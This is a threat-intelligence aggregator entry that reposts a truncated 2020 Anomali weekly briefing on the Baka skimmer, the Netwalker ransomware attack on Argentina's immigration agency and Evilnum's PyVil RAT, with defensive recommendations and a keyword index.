One Article Review
| Source |  Anomali |
|---|---|
| Identifiant | 2103283 |
| Date de publication | 2020-09-09 16:24:00 (vue: 2020-12-15 21:05:33) |
| Titre | Weekly Threat Briefing: Skimmer, Ransomware, APT Group, and More |
| Texte | The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Baka, DDoS, Netwalker, PyVil, Windows Defender, TA413, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
‘Baka’ Javascript Skimmer Identified
(published: September 6, 2020)
Visa have issued a security alert based on identification of a new skimmer, named “Baka”. Based on analysis by Visa Payment Fraud Disruption, the skimmer appears to be more advanced, loading dynamically and using an XOR cipher for obfuscation. The attacks behind Baka are injecting it into checkout pages using a script tag, with the skimming code downloading from the Command and Control (C2) server and executing in memory to steal customer data.
Recommendation: eCommerce site owners must take every step necessary to secure their data and safeguard their payment card information. Visa has also released best practices in the security advisory.
Tags: Baka, Javascript, Skimmer
Netwalker Ransomware Hits Argentinian Government, Demands $4 Million
(published: September 6, 2020)
The Argentinian immigration agency, Dirección Nacional de Migaciones suffered a ransomware attack that shut down border crossings. After receiving many tech support calls, the computer networks were shut down to prevent further spread of the ransomware, which led to a cecission in border crossings until systems were up again. The ransomware used in this attack is Netwalker ransomware, that left a ransom note demanding initalling $2 million, however when this wasn’t paid in the first week, the ransom increased to $4 million.
Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS). Always keep your important files backed up following the 3-2-1 rule: have at least 3 different copies, on 2 different mediums, with 1 off-site. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Argentina, Government, Netwalker, Ransomware
No Rest for the Wicked: Evilnum Unleashes PyVil RAT
(published: September 3, 2020)
Researchers on the Cybereason Nocturnus team have published their research tracking the threat actor group known as Evilnum, and an ongoing change in their tooling and attack procedures. This includes a new Remote Access Trojan (RAT), written in python that they have begun to use. The actor group attacks targets in the financial services sector using highly targeted spearphishing. The phishing lures leverage "Know Your Customer" (KY |
| Envoyé | Oui |
| Condensat | $113 “mpcmdrun 000 2020 450 5776 5777 ability able about access according achieve actions activity actor actors actors' actual adapt add addresses admin administrator advanced advisory affected after again against agencies agency alert all allow allows almost also alto always amazon analysis antimalware antivirus any api appears apple application approach approximately apt apts arbitrary are argentina argentinian armada around asns assist associated att&ck att&ck: attached attachment attachments attack attackers attacks attempt attempts attributed augmented august authentication autonomous availability average avoid backed bad baka bank based bear because been before begun behind being below best bill blend block blocked blocks bodies bookmarking border bot both botnet brand brands briefing briefing: browser btc business but bypass calls campaign campaigns can capabilities card case cecission certain change charts check checked checkout china chinese cipher classified click client code collective command commerce companies company company's compromise computer computers connections considering constant consumers contacted continually continuing control copies cost costs could covid create creating credential credit criminals crooks cross crossings csrf currently customer cve cyber cybereason cybersquatting cybersquatting: data day ddos decryptor defender defense delivered delivering delivery demanding demands denial depending depth designed details detect detection detections devices different diplomatic dirección discovered discuss discussed discussing disruption dissident dissidents distribution doing domain domains down download downloaded downloadfile’ downloading downloads dropper due during dynamically easier ecommerce economic educate educated elsewhere email employees enabled encoding encrypted endpoint enforcement engine enguerran ensure entry especially espionage etc europe european every evilnum evolving exe exe” executable execute executed executing execution exfiltrate exfiltration expect experience exploit exploiting exploits extended extortion facebook facing fail family fancy fee figure file files final finance financial firewall first fix flag flaws focus followed following forgery found fraud frequently from further furthermore generally gillier given glimpse global globally good government group groups hard harder harvesting has have health hids high highest highly hijack hire hits host how however https://api identification identified identify immigration impact impacted impersonating important includes including increase increased indicator infection infections information infrastructure initalling initial initially injecting installing instead intelligence intent interceptor interface investigated ioc iocs issued iteration javascript july keep know known kyc latest law layering lazarus leak least led left legitimacy legitimate levels leverage like likelihood line linkedin lnk loading locations logs loss lures macros magazine magecart magento magmi maintain maintenance major makes malicious malware malwarebytes many march may mean mechanisms mediums memory mention methods microsoft microsoft’s middle migaciones million mimicking mirai mitigation mitre modules/functionality money month more mpcmdrun much multiple must nacional named necessary netflix netwalker network networks new news nocturnus normal not note now number numbers obfuscation observed october off oftentimes ongoing online open opening org/bot* organization’s organizations other out owners pages paid palo parking particularly patch payload payloads payment payment; paypal pays per perceived perform periods persistent personal phishing place plugin points policies posing potential potentially practices pre prevent prevention prime proactive procedures processes profitable program programs proofpoint protecting protection provide public publicly published published: pup purchase python pyvil radware ransom ransoms ransomware rat rate rce receiving recent recommendation: recommended records re |
| Tags | Ransomware Malware Tool Vulnerability Threat Medical |
| Stories | APT 38 APT 28 |
| Notes | ★★★★ |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.